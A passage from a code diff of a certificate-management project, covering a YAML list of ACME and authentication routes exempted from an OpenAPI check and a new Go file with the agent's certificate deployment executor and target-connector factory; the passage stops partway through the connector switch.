why: "ACME server RFC 8555 §7.1.1 directory; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.1.1 directory; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "HEAD /acme/profile/{id}/new-nonce"
|
- route: "HEAD /acme/profile/{id}/new-nonce"
|
||||||
why: "ACME server RFC 8555 §7.2 new-nonce; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.2 new-nonce; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/profile/{id}/new-nonce"
|
- route: "GET /acme/profile/{id}/new-nonce"
|
||||||
why: "ACME server RFC 8555 §7.2 new-nonce GET form; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.2 new-nonce GET form; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/new-account"
|
- route: "POST /acme/profile/{id}/new-account"
|
||||||
why: "ACME server RFC 8555 §7.3 new-account (JWS jwk); documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3 new-account (JWS jwk); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/account/{acc_id}"
|
- route: "POST /acme/profile/{id}/account/{acc_id}"
|
||||||
why: "ACME server RFC 8555 §7.3.2 + §7.3.6 (JWS kid) account update + deactivation; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3.2 + §7.3.6 (JWS kid) account update + deactivation; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/directory"
|
- route: "GET /acme/directory"
|
||||||
why: "ACME server default-profile shorthand; mirrors per-profile when CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID is set."
|
why: "ACME server default-profile shorthand; mirrors per-profile when CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID is set."
|
||||||
|
category: wire-protocol
|
||||||
- route: "HEAD /acme/new-nonce"
|
- route: "HEAD /acme/new-nonce"
|
||||||
why: "ACME server default-profile shorthand for new-nonce HEAD."
|
why: "ACME server default-profile shorthand for new-nonce HEAD."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/new-nonce"
|
- route: "GET /acme/new-nonce"
|
||||||
why: "ACME server default-profile shorthand for new-nonce GET."
|
why: "ACME server default-profile shorthand for new-nonce GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/new-account"
|
- route: "POST /acme/new-account"
|
||||||
why: "ACME server default-profile shorthand for new-account."
|
why: "ACME server default-profile shorthand for new-account."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/account/{acc_id}"
|
- route: "POST /acme/account/{acc_id}"
|
||||||
why: "ACME server default-profile shorthand for account update + deactivation."
|
why: "ACME server default-profile shorthand for account update + deactivation."
|
||||||
|
category: wire-protocol
|
||||||
|
|
||||||
# Phase 2 — orders + finalize + authz + cert.
|
# Phase 2 — orders + finalize + authz + cert.
|
||||||
- route: "POST /acme/profile/{id}/new-order"
|
- route: "POST /acme/profile/{id}/new-order"
|
||||||
why: "ACME server RFC 8555 §7.4 new-order; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 new-order; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/order/{ord_id}"
|
- route: "POST /acme/profile/{id}/order/{ord_id}"
|
||||||
why: "ACME server RFC 8555 §7.4 order POST-as-GET; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 order POST-as-GET; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/order/{ord_id}/finalize"
|
- route: "POST /acme/profile/{id}/order/{ord_id}/finalize"
|
||||||
why: "ACME server RFC 8555 §7.4 finalize; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 finalize; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/authz/{authz_id}"
|
- route: "POST /acme/profile/{id}/authz/{authz_id}"
|
||||||
why: "ACME server RFC 8555 §7.5 authz POST-as-GET; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.5 authz POST-as-GET; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/challenge/{chall_id}"
|
- route: "POST /acme/profile/{id}/challenge/{chall_id}"
|
||||||
why: "ACME server RFC 8555 §7.5.1 challenge response; dispatches to Phase 3 validator pool."
|
why: "ACME server RFC 8555 §7.5.1 challenge response; dispatches to Phase 3 validator pool."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/cert/{cert_id}"
|
- route: "POST /acme/profile/{id}/cert/{cert_id}"
|
||||||
why: "ACME server RFC 8555 §7.4.2 cert download; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4.2 cert download; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/new-order"
|
- route: "POST /acme/new-order"
|
||||||
why: "Phase 2 default-profile shorthand for new-order."
|
why: "Phase 2 default-profile shorthand for new-order."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/order/{ord_id}"
|
- route: "POST /acme/order/{ord_id}"
|
||||||
why: "Phase 2 default-profile shorthand for order POST-as-GET."
|
why: "Phase 2 default-profile shorthand for order POST-as-GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/order/{ord_id}/finalize"
|
- route: "POST /acme/order/{ord_id}/finalize"
|
||||||
why: "Phase 2 default-profile shorthand for finalize."
|
why: "Phase 2 default-profile shorthand for finalize."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/authz/{authz_id}"
|
- route: "POST /acme/authz/{authz_id}"
|
||||||
why: "Phase 2 default-profile shorthand for authz POST-as-GET."
|
why: "Phase 2 default-profile shorthand for authz POST-as-GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/challenge/{chall_id}"
|
- route: "POST /acme/challenge/{chall_id}"
|
||||||
why: "Phase 3 default-profile shorthand for challenge response."
|
why: "Phase 3 default-profile shorthand for challenge response."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/cert/{cert_id}"
|
- route: "POST /acme/cert/{cert_id}"
|
||||||
why: "Phase 2 default-profile shorthand for cert download."
|
why: "Phase 2 default-profile shorthand for cert download."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/key-change"
|
- route: "POST /acme/profile/{id}/key-change"
|
||||||
why: "ACME server RFC 8555 §7.3.5 doubly-signed key rollover; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3.5 doubly-signed key rollover; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/revoke-cert"
|
- route: "POST /acme/profile/{id}/revoke-cert"
|
||||||
why: "ACME server RFC 8555 §7.6 revoke-cert (kid OR cert-key auth); documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.6 revoke-cert (kid OR cert-key auth); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/profile/{id}/renewal-info/{cert_id}"
|
- route: "GET /acme/profile/{id}/renewal-info/{cert_id}"
|
||||||
why: "ACME server RFC 9773 ACME Renewal Information (unauthenticated GET); documented in docs/acme-server.md."
|
why: "ACME server RFC 9773 ACME Renewal Information (unauthenticated GET); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/key-change"
|
- route: "POST /acme/key-change"
|
||||||
why: "Phase 4 default-profile shorthand for key rollover."
|
why: "Phase 4 default-profile shorthand for key rollover."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/revoke-cert"
|
- route: "POST /acme/revoke-cert"
|
||||||
why: "Phase 4 default-profile shorthand for revoke-cert."
|
why: "Phase 4 default-profile shorthand for revoke-cert."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/renewal-info/{cert_id}"
|
- route: "GET /acme/renewal-info/{cert_id}"
|
||||||
why: "Phase 4 default-profile shorthand for ARI."
|
why: "Phase 4 default-profile shorthand for ARI."
|
||||||
|
category: wire-protocol
|
||||||
|
|
||||||
# =============================================================================
|
# =============================================================================
|
||||||
# Auth Bundle 2 + audit-2026-05-10/11 fix bundle — REST endpoints not yet
|
# Auth Bundle 2 + audit-2026-05-10/11 fix bundle — REST endpoints not yet
|
||||||
@@ -119,59 +199,3 @@ documented_exceptions:
|
|||||||
# stays green for the v2.1.0 release tag. Threat model + handler contracts
|
# stays green for the v2.1.0 release tag. Threat model + handler contracts
|
||||||
# live in docs/operator/{rbac.md,auth-threat-model.md,oidc-runbooks/*}.
|
# live in docs/operator/{rbac.md,auth-threat-model.md,oidc-runbooks/*}.
|
||||||
# =============================================================================
|
# =============================================================================
|
||||||
- route: "GET /auth/oidc/login"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC login redirect; user-facing 302 with state cookie. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "GET /auth/oidc/callback"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC callback handler; RFC 9700 §4.7.1 + RFC 9207. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/logout"
|
|
||||||
why: "Bundle 2 Phase 5 cookie + CSRF revoker. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/breakglass/login"
|
|
||||||
why: "Bundle 2 Phase 7.5 public break-glass login (auth-bypass, 404 when disabled). OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/oidc/back-channel-logout"
|
|
||||||
why: "Bundle 2 Phase 5 RFC OIDC Back-Channel Logout 1.0 endpoint. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "GET /api/v1/auth/sessions"
|
|
||||||
why: "Bundle 2 Phase 5 self/admin session list. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "DELETE /api/v1/auth/sessions/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 session revoke. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "DELETE /api/v1/auth/sessions"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-2/3 revoke-all-except-current."
|
|
||||||
- route: "GET /api/v1/auth/oidc/providers"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (list)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/providers"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (create)."
|
|
||||||
- route: "PUT /api/v1/auth/oidc/providers/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (update)."
|
|
||||||
- route: "DELETE /api/v1/auth/oidc/providers/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (delete)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/providers/{id}/refresh"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-7 JWKS hot-refresh."
|
|
||||||
- route: "GET /api/v1/auth/oidc/providers/{id}/jwks-status"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-7 JWKS health snapshot."
|
|
||||||
- route: "POST /api/v1/auth/oidc/test"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-5 dry-run discovery + JWKS + alg-downgrade check."
|
|
||||||
- route: "GET /api/v1/auth/oidc/group-mappings"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (list)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/group-mappings"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (create)."
|
|
||||||
- route: "DELETE /api/v1/auth/oidc/group-mappings/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (delete)."
|
|
||||||
- route: "GET /api/v1/auth/breakglass/credentials"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass list (404 when disabled; password hash never on wire)."
|
|
||||||
- route: "POST /api/v1/auth/breakglass/credentials"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass set/rotate password."
|
|
||||||
- route: "POST /api/v1/auth/breakglass/credentials/{actor_id}/unlock"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass unlock after lockout."
|
|
||||||
- route: "DELETE /api/v1/auth/breakglass/credentials/{actor_id}"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass credential delete."
|
|
||||||
- route: "GET /api/v1/auth/users"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 users page."
|
|
||||||
- route: "DELETE /api/v1/auth/users/{id}"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 user deactivate."
|
|
||||||
- route: "POST /api/v1/auth/users/{id}/reactivate"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 user reactivate."
|
|
||||||
- route: "GET /api/v1/auth/runtime-config"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-12 effective auth-runtime-config (read-only)."
|
|
||||||
- route: "POST /api/v1/auth/demo-residual/cleanup"
|
|
||||||
why: "Audit 2026-05-11 A-8 demo-mode residual-grants cleanup endpoint."
|
|
||||||
- route: "GET /api/v1/audit/export"
|
|
||||||
why: "Bundle 1 Phase 8 streaming NDJSON audit export."
|
|
||||||
|
|||||||
+1376
-1
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,443 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/apache"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/awsacm"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/azurekv"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/caddy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/envoy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/f5"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/haproxy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/iis"
|
||||||
|
jks "github.com/certctl-io/certctl/internal/connector/target/javakeystore"
|
||||||
|
k8s "github.com/certctl-io/certctl/internal/connector/target/k8ssecret"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/nginx"
|
||||||
|
pf "github.com/certctl-io/certctl/internal/connector/target/postfix"
|
||||||
|
sshconn "github.com/certctl-io/certctl/internal/connector/target/ssh"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/traefik"
|
||||||
|
wcs "github.com/certctl-io/certctl/internal/connector/target/wincertstore"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the DEPLOYMENT executor + the target connector
|
||||||
|
// factory + the deploy-only helpers:
|
||||||
|
//
|
||||||
|
// - executeDeploymentJob: handles Pending deployment jobs by
|
||||||
|
// fetching the cert PEM from the control plane, loading the
|
||||||
|
// locally-held private key (in agent keygen mode), instantiating
|
||||||
|
// the appropriate target connector via createTargetConnector,
|
||||||
|
// calling DeployCertificate on it, and reporting Completed or
|
||||||
|
// Failed back to the control plane.
|
||||||
|
// - createTargetConnector: the big switch over target_type that
|
||||||
|
// instantiates one of 15 target connectors (apache / awsacm /
|
||||||
|
// azurekv / caddy / envoy / f5 / haproxy / iis / javakeystore /
|
||||||
|
// k8ssecret / nginx / postfix / ssh / traefik / wincertstore).
|
||||||
|
// Context is threaded into SDK-driven connectors (AWSACM,
|
||||||
|
// AzureKeyVault) so credential resolution honors caller
|
||||||
|
// cancellation per the contextcheck linter — see CI commit
|
||||||
|
// 502823d.
|
||||||
|
// - splitPEMChain: split a PEM chain into (first cert, rest).
|
||||||
|
// - fetchCertificate: pull the PEM chain from
|
||||||
|
// GET /api/v1/agents/{agentID}/certificates/{certID}.
|
||||||
|
//
|
||||||
|
// All 15 target-connector imports were used ONLY by
|
||||||
|
// createTargetConnector; moving the factory here also moved the
|
||||||
|
// 15 connector imports out of main.go, leaving the surviving
|
||||||
|
// cmd/agent/main.go with the minimal stdlib surface its lifecycle
|
||||||
|
// + HTTP infrastructure needs.
|
||||||
|
|
||||||
|
// executeDeploymentJob executes a deployment job by fetching the certificate and deploying it
|
||||||
|
// to the target system using the appropriate connector (NGINX, F5 BIG-IP, or IIS).
|
||||||
|
//
|
||||||
|
// For agent keygen mode, the private key is read from the local key store (keyDir/certID.key)
|
||||||
|
// rather than fetched from the server. The deployment includes the locally-held key.
|
||||||
|
//
|
||||||
|
// Flow:
|
||||||
|
// 1. Report job as Running
|
||||||
|
// 2. Fetch the certificate PEM from the control plane
|
||||||
|
// 3. Load local private key if it exists (agent keygen mode)
|
||||||
|
// 4. Instantiate the target connector based on target_type from the work response
|
||||||
|
// 5. Call DeployCertificate on the connector
|
||||||
|
// 6. Report job as Completed (or Failed)
|
||||||
|
func (a *Agent) executeDeploymentJob(ctx context.Context, job JobItem) {
|
||||||
|
a.logger.Info("executing deployment job",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"target_type", job.TargetType)
|
||||||
|
|
||||||
|
// Report job as running
|
||||||
|
if err := a.reportJobStatus(ctx, job.ID, "Running", ""); err != nil {
|
||||||
|
a.logger.Error("failed to report job running", "error", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fetch the certificate from the control plane
|
||||||
|
certPEM, err := a.fetchCertificate(ctx, job.CertificateID)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to fetch certificate",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("cert fetch failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("certificate fetched for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"cert_length", len(certPEM))
|
||||||
|
|
||||||
|
// Split PEM into cert and chain (separated by double newline between PEM blocks)
|
||||||
|
certOnly, chainPEM := splitPEMChain(certPEM)
|
||||||
|
|
||||||
|
// Check for locally-stored private key (agent keygen mode)
|
||||||
|
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
||||||
|
var keyPEM string
|
||||||
|
keyData, err := os.ReadFile(keyPath)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to read local private key for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key read failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
keyPEM = string(keyData)
|
||||||
|
a.logger.Info("loaded local private key for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath)
|
||||||
|
|
||||||
|
// Deploy to the target using the appropriate connector
|
||||||
|
if job.TargetType != "" {
|
||||||
|
connector, err := a.createTargetConnector(ctx, job.TargetType, job.TargetConfig)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to create target connector",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("connector init failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Bundle 1 / RT-C1 closure (2026-05-12): defense in depth. The server
|
||||||
|
// runs internal/connector/target/configcheck.Validate on the way IN
|
||||||
|
// (Create/Update), and rejects shell metacharacters in command-bearing
|
||||||
|
// fields. Re-run the connector's full ValidateConfig here on the way
|
||||||
|
// OUT, before any DeployCertificate call. This catches (a) configs
|
||||||
|
// that pre-date the server-side guard, (b) corruption/tampering of
|
||||||
|
// the encrypted config blob, and (c) per-connector filesystem
|
||||||
|
// invariants (cert dir exists, paths writable) that the server can't
|
||||||
|
// check because the filesystem is on the agent host.
|
||||||
|
if err := connector.ValidateConfig(ctx, job.TargetConfig); err != nil {
|
||||||
|
a.logger.Error("connector config validation failed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("%s config validation failed: %v", job.TargetType, err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
deployReq := target.DeploymentRequest{
|
||||||
|
CertPEM: certOnly,
|
||||||
|
KeyPEM: keyPEM,
|
||||||
|
ChainPEM: chainPEM,
|
||||||
|
TargetConfig: job.TargetConfig,
|
||||||
|
Metadata: map[string]string{
|
||||||
|
"certificate_id": job.CertificateID,
|
||||||
|
"job_id": job.ID,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Phase 2 of the deploy-hardening I master bundle:
|
||||||
|
// per-target deploy mutex. Acquire BEFORE
|
||||||
|
// DeployCertificate so two concurrent renewals against
|
||||||
|
// the same target ID serialize. The lock is held for the
|
||||||
|
// full Deploy duration including PreCommit (validate),
|
||||||
|
// PostCommit (reload), and post-deploy verify (Phases
|
||||||
|
// 4-9). Released on every return path via defer.
|
||||||
|
var targetID string
|
||||||
|
if job.TargetID != nil {
|
||||||
|
targetID = *job.TargetID
|
||||||
|
}
|
||||||
|
if mu := a.targetDeployMutex(targetID); mu != nil {
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
result, err := connector.DeployCertificate(ctx, deployReq)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("deployment failed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("deployment failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("target connector deployment completed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"success", result.Success,
|
||||||
|
"message", result.Message)
|
||||||
|
|
||||||
|
// If verification is enabled, verify the deployment by probing the live TLS endpoint
|
||||||
|
targetHost, targetPort, err := extractTargetHostAndPort(job.TargetConfig)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Warn("could not extract target host/port for verification",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
} else {
|
||||||
|
a.verifyAndReportDeployment(ctx, job, targetHost, targetPort, certOnly)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
a.logger.Info("no target type specified, skipping connector invocation",
|
||||||
|
"job_id", job.ID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Report job as completed
|
||||||
|
if err := a.reportJobStatus(ctx, job.ID, "Completed", ""); err != nil {
|
||||||
|
a.logger.Error("failed to report job completed", "error", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("deployment job completed", "job_id", job.ID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// createTargetConnector instantiates the appropriate target connector based on type.
|
||||||
|
// ctx is threaded into SDK-driven connectors (AWSACM, AzureKeyVault) so credential
|
||||||
|
// resolution honors caller cancellation / deadlines instead of using a fresh
|
||||||
|
// context.Background() (the contextcheck linter enforces this — the original Rank 5
|
||||||
|
// implementation used Background() and tripped CI on commit 502823d).
|
||||||
|
func (a *Agent) createTargetConnector(ctx context.Context, targetType string, configJSON json.RawMessage) (target.Connector, error) {
|
||||||
|
switch targetType {
|
||||||
|
case "NGINX":
|
||||||
|
var cfg nginx.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid NGINX config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nginx.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Apache":
|
||||||
|
var cfg apache.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Apache config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return apache.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "HAProxy":
|
||||||
|
var cfg haproxy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid HAProxy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return haproxy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "F5":
|
||||||
|
var cfg f5.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid F5 config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
conn, err := f5.New(&cfg, a.logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to create F5 connector: %w", err)
|
||||||
|
}
|
||||||
|
return conn, nil
|
||||||
|
|
||||||
|
case "IIS":
|
||||||
|
var cfg iis.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid IIS config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return iis.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "Traefik":
|
||||||
|
var cfg traefik.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Traefik config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return traefik.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Caddy":
|
||||||
|
var cfg caddy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Caddy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return caddy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Envoy":
|
||||||
|
var cfg envoy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Envoy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return envoy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Postfix":
|
||||||
|
var cfg pf.Config
|
||||||
|
cfg.Mode = "postfix"
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Postfix config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return pf.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Dovecot":
|
||||||
|
var cfg pf.Config
|
||||||
|
cfg.Mode = "dovecot"
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Dovecot config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return pf.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "SSH":
|
||||||
|
var cfg sshconn.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid SSH config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return sshconn.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "WinCertStore":
|
||||||
|
var cfg wcs.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid WinCertStore config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return wcs.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "JavaKeystore":
|
||||||
|
var cfg jks.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
